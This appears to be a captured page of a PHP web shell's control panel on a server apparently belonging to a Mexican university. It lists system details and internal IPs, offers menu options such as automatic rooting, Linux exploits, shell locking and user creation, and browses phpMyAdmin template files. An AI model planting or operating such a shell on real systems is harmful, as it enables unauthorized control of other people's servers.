Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
columns_definitions
[ DIR ]
drwxrwxr-x
components
[ DIR ]
drwxrwxr-x
console
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
error
[ DIR ]
drwxrwxr-x
export
[ DIR ]
drwxrwxr-x
javascript
[ DIR ]
drwxrwxr-x
list
[ DIR ]
drwxrwxr-x
navigation
[ DIR ]
drwxrwxr-x
privileges
[ DIR ]
drwxrwxr-x
server
[ DIR ]
drwxrwxr-x
table
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
checkbox.phtml
575
B
-rwxrwxr-x
div_for_slider_effect.phtml
710
B
-rwxrwxr-x
filter.phtml
324
B
-rwxrwxr-x
header_location.phtml
909
B
-rwxrwxr-x
prefs_autoload.phtml
721
B
-rwxrwxr-x
preview_sql.phtml
382
B
-rwxrwxr-x
secondary_tabs.phtml
188
B
-rwxrwxr-x
select_all.phtml
458
B
-rwxrwxr-x
select_lang.phtml
973
B
-rwxrwxr-x
startAndNumberOfRowsPanel.phtml
892
B
-rwxrwxr-x
toggle_button.phtml
1.28
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : div_for_slider_effect.phtml
<?php if($InitialSlidersState == 'disabled'): ?> <div <?= $id? "id=\"$id\"": '' ?>> <?php else: ?> <?php /** * Bad hack on the next line. document.write() conflicts with jQuery, * hence, opening the <div> with PHP itself instead of JavaScript. * * @todo find a better solution that uses $.append(), the recommended * method maybe by using an additional param, the id of the div to * append to */ ?> <div <?= $id? "id=\"$id\"": '' ?> <?= ($InitialSlidersState == 'closed')? ' style="display: none; overflow:auto;"':'' ?> class="pma_auto_slider" <?= $message? 'title="'. htmlspecialchars($message) . '"': ""?> > <?php endif; ?>
Close